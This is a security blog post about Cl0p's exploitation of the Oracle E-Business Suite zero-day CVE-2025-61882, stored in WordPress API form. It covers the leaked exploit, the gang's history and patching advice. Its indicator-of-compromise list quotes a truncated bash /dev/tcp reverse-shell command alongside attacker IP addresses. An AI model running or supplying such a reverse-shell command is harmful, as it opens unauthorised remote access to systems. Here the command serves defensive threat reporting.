{"id":4004,"date":"2025-10-07T05:21:33","date_gmt":"2025-10-07T05:21:33","guid":{"rendered":"https:\/\/certera.com\/blog\/?p=4004"},"modified":"2025-10-13T04:56:39","modified_gmt":"2025-10-13T04:56:39","slug":"oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft","status":"publish","type":"post","link":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/","title":{"rendered":"Oracle\u2019s 9.8 CVSS Nightmare: Cl0p Exploits CVE-2025-61882 in a Wave of Data Theft"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">The infamous ransomware gang is back in the spotlight, this time targeting Oracle\u2019s E-Business Suite, and yes, Oracle just dropped an emergency patch.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Late last week, Oracle confirmed what cybersecurity pros had feared. A critical zero-day vulnerability <strong>(<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-61882\">CVE-2025-61882<\/a>)<\/strong> was being actively exploited in the wild.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The <strong>flaw scores 9.8 on the CVSS scale<\/strong>, meaning it\u2019s basically the cybersecurity equivalent of a Category-5 hurricane.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Attackers can remotely execute code without authentication, no username, no password, just a direct hit via HTTP. Once inside, they can completely take over Oracle\u2019s Concurrent Processing component of the E-Business Suite.<\/p>\n\n\n\n<p class=\"quote-section wp-block-paragraph\"><strong><a href=\"https:\/\/www.oracle.com\/security-alerts\/alert-cve-2025-61882.html\">Oracle\u2019s own advisory said<\/a> it best:<\/strong> This vulnerability is remotely exploitable without authentication&#8230; and may result in remote code execution.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Anyone with network access could hijack your Oracle server.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The <strong>Affected versions are<\/strong> <strong>12.2.3 &#8211; 12.2.14<\/strong> versions of E-Business Suite that are vulnerable.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-the-exploit-leaked\">The Exploit Leaked<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Soon after the attacks came to light, a mysterious group calling themselves <strong>\u201cScattered Lapsus$ Hunters\u201d<\/strong> leaked what they claimed was the <strong>actual exploit code on Telegram.<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The leak included <strong>two Python scripts (exp.py and server.py)<\/strong> capable of opening reverse shells to the attacker\u2019s server, the kind of code that keeps SOC teams awake at 3 AM.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Oracle\u2019s indicators of compromise (IoCs) match what was leaked:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>200.107.207[.]26 (HTTP GET\/POST activity)<\/li>\n\n\n\n<li>185.181.60[.]11 (HTTP GET\/POST activity)<\/li>\n\n\n\n<li>Reverse shell command: sh -c \/bin\/bash -i &gt;&amp; \/dev\/tcp\/&#8230; 0&gt;&amp;1<\/li>\n\n\n\n<li>Exploit archive: oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">That\u2019s not just a PoC floating around, it\u2019s the real weapon Cl0p used in August\u2019s massive data theft campaign.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Also Read:<\/strong> <a href=\"https:\/\/certera.com\/blog\/critical-zero-day-vulnerability-exploited-in-fortinet-devices\/\">Critical Zero-Day Vulnerability Exploited in Fortinet Devices<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-the-cl0p-connection-between-moveit-and-oracle\">The Cl0p Connection Between MOVEit and Oracle<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Cl0p has a masterclass in zero-day exploitation that has been going on over the last few years:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>2020: <\/strong>Accellion FTA &#8211; 100+ orgs breached<\/li>\n\n\n\n<li><strong>2021:<\/strong> SolarWinds serve-U FTP &#8211; remote takeover.<\/li>\n\n\n\n<li><strong>2023:<\/strong> GoAnywhere MFT &#8211; 100+ companies hit.<\/li>\n\n\n\n<li><strong>2023:<\/strong> MOVEit Transfer &#8211; 2,773 organisations attacked in the world.<\/li>\n\n\n\n<li><strong>2024:<\/strong> Cleo file transfer 0days &#8211; double hit.<\/li>\n\n\n\n<li><strong>2025: <\/strong>Oracle E-Business Suite &#8211; the newest trophy.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Mandiant CSO Charles Carmakal affirmed<\/strong> that Cl0p used numerous Oracle vulnerabilities, among them being patched in July, and the new zero-day was patched this weekend.<\/p>\n\n\n\n<p class=\"quote-section wp-block-paragraph\">He warned, \u201cGiven the broad mass zero-day exploitation that has already occurred\u2026 organisations should examine whether they were already compromised.\u201d<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-behind-the-scenes\">Behind the Scenes<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Scattered Lapsus$ Hunters, a disorderly amalgamation of menace perpetrators purporting connections to Scattered Spider, Lapsus, and ShinyHunters, affirm to have initially built the exploit. Then somebody supposedly got it or sold it to Cl0p.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>ShinyHunters said<\/strong>, That was mine&#8230; and came and said, It made me angry how it should be used by another group, so we leaked it. No hate to Cl0p.&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We are now in the drama of cybercriminals, the leakage of codes, and billion-dollar businesses madly rushing ahead to fix everything by the beginning of Monday morning.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Also Read:<\/strong> <a href=\"https:\/\/certera.com\/blog\/toolshell-zero-day-us-cisa-urges-fceb-agencies-to-fix-2-microsoft-sharepoint-flaws-immediately\/\">ToolShell Zero-day: U.S. CISA urges FCEB Agencies to Fix 2 Microsoft SharePoint Flaws Immediately<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-what-you-should-do-right-now\">What You Should Do Right Now<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Patch Immediately. <\/strong>Install the latest Oracle update and verify dependencies.<\/li>\n\n\n\n<li><strong>Check for Compromise.<\/strong> IoCs that are Oracle listed and their scan logs. Monitor the suspicious IPs and shell commands.<\/li>\n\n\n\n<li><strong>Isolate and Monitor.<\/strong> In case of some suspicious activity, you should shut down affected servers and initiate a forensic investigation.<\/li>\n\n\n\n<li><strong>Communicate Internally.<\/strong> Align adoption of IT, security, and management with the response plan. Silence kills speed.<\/li>\n\n\n\n<li><strong>Don&#8217;t Wait for the Next CVE.<\/strong> Cl0p has demonstrated that they can go on toes. Were you assuming that their opportunity window is your patch window?<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-conclusion\">Conclusion<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">In the end, Oracle\u2019s scramble to patch CVE-2025-61882 isn\u2019t just another vendor update. It\u2019s a reminder that even enterprise-grade systems can fall overnight when cybercriminals move faster than the patch cycle. The Cl0p gang has proven, once again, that <a href=\"https:\/\/certera.com\/blog\/what-are-zero-day-exploits-attacks-and-vulnerabilities\/\">zero-day exploitation<\/a> isn\u2019t slowing down. It\u2019s scaling up.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">If your organisation uses Oracle E-Business Suite or any critical enterprise software, don\u2019t wait for headlines to remind you what\u2019s at stake. Act now, patch, investigate, and strengthen your defences.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Need help assessing your environment or ensuring you\u2019re protected from the next big exploit? <strong>Contact us <\/strong>for cybersecurity consulting and services. Our experts can help secure your business before attackers find their way in.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The infamous ransomware gang is back in the spotlight, this time targeting Oracle\u2019s E-Business Suite, and yes, Oracle just dropped an emergency patch. Late last week, Oracle confirmed what cybersecurity pros had feared. A critical zero-day vulnerability (CVE-2025-61882) was being actively exploited in the wild. The flaw scores 9.8 on the CVSS scale, meaning it\u2019s<span class=\"morelink d-block mt-3\"><a href=\"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/\">Read More<\/a><\/span><\/p>\n","protected":false},"author":1,"featured_media":4005,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[48,32],"tags":[774],"class_list":["post-4004","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-data-breach","category-vulnerability","tag-oracle-rushes-patch-for-cve-2025-61882","entry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Cl0p Strikes Again: Oracle Rushes Emergency Patch After Massive Data Theft<\/title>\n<meta name=\"description\" content=\"Oracle in Crisis Mode as Cl0p Targets E-Business Suite with Fresh Zero-Day Attack. Hackers Leak Oracle Exploit Code. Know more on it.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cl0p Strikes Again: Oracle Rushes Emergency Patch After Massive Data Theft\" \/>\n<meta property=\"og:description\" content=\"Oracle in Crisis Mode as Cl0p Targets E-Business Suite with Fresh Zero-Day Attack. Hackers Leak Oracle Exploit Code. Know more on it.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/\" \/>\n<meta property=\"og:site_name\" content=\"EncryptedFence by Certera - Web &amp; Cyber Security Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/certeraLLC\/\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-07T05:21:33+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-13T04:56:39+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/certera.com\/blog\/wp-content\/uploads\/2025\/10\/oracle-zero-day-exploit.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"960\" \/>\n\t<meta property=\"og:image:height\" content=\"620\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Janki Mehta\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@certera_llc\" \/>\n<meta name=\"twitter:site\" content=\"@certera_llc\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Janki Mehta\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/\"},\"author\":{\"name\":\"Janki Mehta\",\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/#\\\/schema\\\/person\\\/e5a476aa90d9e02260ebfe4b0bf046b7\"},\"headline\":\"Oracle\u2019s 9.8 CVSS Nightmare: Cl0p Exploits CVE-2025-61882 in a Wave of Data Theft\",\"datePublished\":\"2025-10-07T05:21:33+00:00\",\"dateModified\":\"2025-10-13T04:56:39+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/\"},\"wordCount\":736,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/certera.com\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/oracle-zero-day-exploit.webp\",\"keywords\":[\"Oracle Rushes Patch for CVE-2025-61882\"],\"articleSection\":[\"Data Breach\",\"Vulnerability\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/#respond\"]}],\"copyrightYear\":\"2025\",\"copyrightHolder\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/#organization\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/\",\"url\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/\",\"name\":\"Cl0p Strikes Again: Oracle Rushes Emergency Patch After Massive Data Theft\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/certera.com\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/oracle-zero-day-exploit.webp\",\"datePublished\":\"2025-10-07T05:21:33+00:00\",\"dateModified\":\"2025-10-13T04:56:39+00:00\",\"description\":\"Oracle in Crisis Mode as Cl0p Targets E-Business Suite with Fresh Zero-Day Attack. Hackers Leak Oracle Exploit Code. Know more on it.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/#primaryimage\",\"url\":\"https:\\\/\\\/certera.com\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/oracle-zero-day-exploit.webp\",\"contentUrl\":\"https:\\\/\\\/certera.com\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/oracle-zero-day-exploit.webp\",\"width\":960,\"height\":620,\"caption\":\"Oracle Zero-Day Chaos\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/certera.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Oracle\u2019s 9.8 CVSS Nightmare: Cl0p Exploits CVE-2025-61882 in a Wave of Data Theft\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/certera.com\\\/blog\\\/\",\"name\":\"EncryptedFence by Certera - Web & Cyber Security Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/#organization\"},\"alternateName\":\"Certera's EncryptedFence Blog\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/certera.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/#organization\",\"name\":\"Certera\",\"url\":\"https:\\\/\\\/certera.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/certera.com\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/logo-encryptedfence.svg\",\"contentUrl\":\"https:\\\/\\\/certera.com\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/logo-encryptedfence.svg\",\"caption\":\"Certera\"},\"image\":{\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/certeraLLC\\\/\",\"https:\\\/\\\/x.com\\\/certera_llc\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/certera-llc\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/certera.com\\\/blog\\\/#\\\/schema\\\/person\\\/e5a476aa90d9e02260ebfe4b0bf046b7\",\"name\":\"Janki Mehta\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/1fba817ef81065f1393461fc3a0d85c40f2cc826919819ea4df4b12d76566e62?s=96&d=https%3A%2F%2Fcertera.com%2Fblog%2Fwp-content%2Fuploads%2F2023%2F02%2Fhttps-vs-sftp-jpg.webp&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/1fba817ef81065f1393461fc3a0d85c40f2cc826919819ea4df4b12d76566e62?s=96&d=https%3A%2F%2Fcertera.com%2Fblog%2Fwp-content%2Fuploads%2F2023%2F02%2Fhttps-vs-sftp-jpg.webp&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/1fba817ef81065f1393461fc3a0d85c40f2cc826919819ea4df4b12d76566e62?s=96&d=https%3A%2F%2Fcertera.com%2Fblog%2Fwp-content%2Fuploads%2F2023%2F02%2Fhttps-vs-sftp-jpg.webp&r=g\",\"caption\":\"Janki Mehta\"},\"description\":\"Janki Mehta is a passionate Cyber-Security Enthusiast who keenly monitors the latest developments in the Web\\\/Cyber Security industry. She puts her knowledge into practice and helps web users by arming them with the necessary security measures to stay safe in the digital world.\",\"sameAs\":[\"https:\\\/\\\/certerassl.com\\\/\"],\"url\":\"https:\\\/\\\/certera.com\\\/blog\\\/author\\\/certerabguser\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cl0p Strikes Again: Oracle Rushes Emergency Patch After Massive Data Theft","description":"Oracle in Crisis Mode as Cl0p Targets E-Business Suite with Fresh Zero-Day Attack. Hackers Leak Oracle Exploit Code. Know more on it.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/","og_locale":"en_US","og_type":"article","og_title":"Cl0p Strikes Again: Oracle Rushes Emergency Patch After Massive Data Theft","og_description":"Oracle in Crisis Mode as Cl0p Targets E-Business Suite with Fresh Zero-Day Attack. Hackers Leak Oracle Exploit Code. Know more on it.","og_url":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/","og_site_name":"EncryptedFence by Certera - Web &amp; Cyber Security Blog","article_publisher":"https:\/\/www.facebook.com\/certeraLLC\/","article_published_time":"2025-10-07T05:21:33+00:00","article_modified_time":"2025-10-13T04:56:39+00:00","og_image":[{"width":960,"height":620,"url":"https:\/\/certera.com\/blog\/wp-content\/uploads\/2025\/10\/oracle-zero-day-exploit.webp","type":"image\/jpeg"}],"author":"Janki Mehta","twitter_card":"summary_large_image","twitter_creator":"@certera_llc","twitter_site":"@certera_llc","twitter_misc":{"Written by":"Janki Mehta","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/#article","isPartOf":{"@id":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/"},"author":{"name":"Janki Mehta","@id":"https:\/\/certera.com\/blog\/#\/schema\/person\/e5a476aa90d9e02260ebfe4b0bf046b7"},"headline":"Oracle\u2019s 9.8 CVSS Nightmare: Cl0p Exploits CVE-2025-61882 in a Wave of Data Theft","datePublished":"2025-10-07T05:21:33+00:00","dateModified":"2025-10-13T04:56:39+00:00","mainEntityOfPage":{"@id":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/"},"wordCount":736,"commentCount":0,"publisher":{"@id":"https:\/\/certera.com\/blog\/#organization"},"image":{"@id":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/#primaryimage"},"thumbnailUrl":"https:\/\/certera.com\/blog\/wp-content\/uploads\/2025\/10\/oracle-zero-day-exploit.webp","keywords":["Oracle Rushes Patch for CVE-2025-61882"],"articleSection":["Data Breach","Vulnerability"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/#respond"]}],"copyrightYear":"2025","copyrightHolder":{"@id":"https:\/\/certera.com\/blog\/#organization"}},{"@type":"WebPage","@id":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/","url":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/","name":"Cl0p Strikes Again: Oracle Rushes Emergency Patch After Massive Data Theft","isPartOf":{"@id":"https:\/\/certera.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/#primaryimage"},"image":{"@id":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/#primaryimage"},"thumbnailUrl":"https:\/\/certera.com\/blog\/wp-content\/uploads\/2025\/10\/oracle-zero-day-exploit.webp","datePublished":"2025-10-07T05:21:33+00:00","dateModified":"2025-10-13T04:56:39+00:00","description":"Oracle in Crisis Mode as Cl0p Targets E-Business Suite with Fresh Zero-Day Attack. Hackers Leak Oracle Exploit Code. Know more on it.","breadcrumb":{"@id":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/#primaryimage","url":"https:\/\/certera.com\/blog\/wp-content\/uploads\/2025\/10\/oracle-zero-day-exploit.webp","contentUrl":"https:\/\/certera.com\/blog\/wp-content\/uploads\/2025\/10\/oracle-zero-day-exploit.webp","width":960,"height":620,"caption":"Oracle Zero-Day Chaos"},{"@type":"BreadcrumbList","@id":"https:\/\/certera.com\/blog\/oracles-9-8-cvss-nightmare-cl0p-exploits-cve-2025-61882-in-a-wave-of-data-theft\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/certera.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Oracle\u2019s 9.8 CVSS Nightmare: Cl0p Exploits CVE-2025-61882 in a Wave of Data Theft"}]},{"@type":"WebSite","@id":"https:\/\/certera.com\/blog\/#website","url":"https:\/\/certera.com\/blog\/","name":"EncryptedFence by Certera - Web & Cyber Security Blog","description":"","publisher":{"@id":"https:\/\/certera.com\/blog\/#organization"},"alternateName":"Certera's EncryptedFence Blog","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/certera.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/certera.com\/blog\/#organization","name":"Certera","url":"https:\/\/certera.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/certera.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/certera.com\/blog\/wp-content\/uploads\/2023\/08\/logo-encryptedfence.svg","contentUrl":"https:\/\/certera.com\/blog\/wp-content\/uploads\/2023\/08\/logo-encryptedfence.svg","caption":"Certera"},"image":{"@id":"https:\/\/certera.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/certeraLLC\/","https:\/\/x.com\/certera_llc","https:\/\/www.linkedin.com\/company\/certera-llc\/"]},{"@type":"Person","@id":"https:\/\/certera.com\/blog\/#\/schema\/person\/e5a476aa90d9e02260ebfe4b0bf046b7","name":"Janki Mehta","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/1fba817ef81065f1393461fc3a0d85c40f2cc826919819ea4df4b12d76566e62?s=96&d=https%3A%2F%2Fcertera.com%2Fblog%2Fwp-content%2Fuploads%2F2023%2F02%2Fhttps-vs-sftp-jpg.webp&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/1fba817ef81065f1393461fc3a0d85c40f2cc826919819ea4df4b12d76566e62?s=96&d=https%3A%2F%2Fcertera.com%2Fblog%2Fwp-content%2Fuploads%2F2023%2F02%2Fhttps-vs-sftp-jpg.webp&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/1fba817ef81065f1393461fc3a0d85c40f2cc826919819ea4df4b12d76566e62?s=96&d=https%3A%2F%2Fcertera.com%2Fblog%2Fwp-content%2Fuploads%2F2023%2F02%2Fhttps-vs-sftp-jpg.webp&r=g","caption":"Janki Mehta"},"description":"Janki Mehta is a passionate Cyber-Security Enthusiast who keenly monitors the latest developments in the Web\/Cyber Security industry. She puts her knowledge into practice and helps web users by arming them with the necessary security measures to stay safe in the digital world.","sameAs":["https:\/\/certerassl.com\/"],"url":"https:\/\/certera.com\/blog\/author\/certerabguser\/"}]}},"_links":{"self":[{"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/posts\/4004","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/comments?post=4004"}],"version-history":[{"count":4,"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/posts\/4004\/revisions"}],"predecessor-version":[{"id":4061,"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/posts\/4004\/revisions\/4061"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/media\/4005"}],"wp:attachment":[{"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/media?parent=4004"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/categories?post=4004"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/certera.com\/blog\/wp-json\/wp\/v2\/tags?post=4004"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}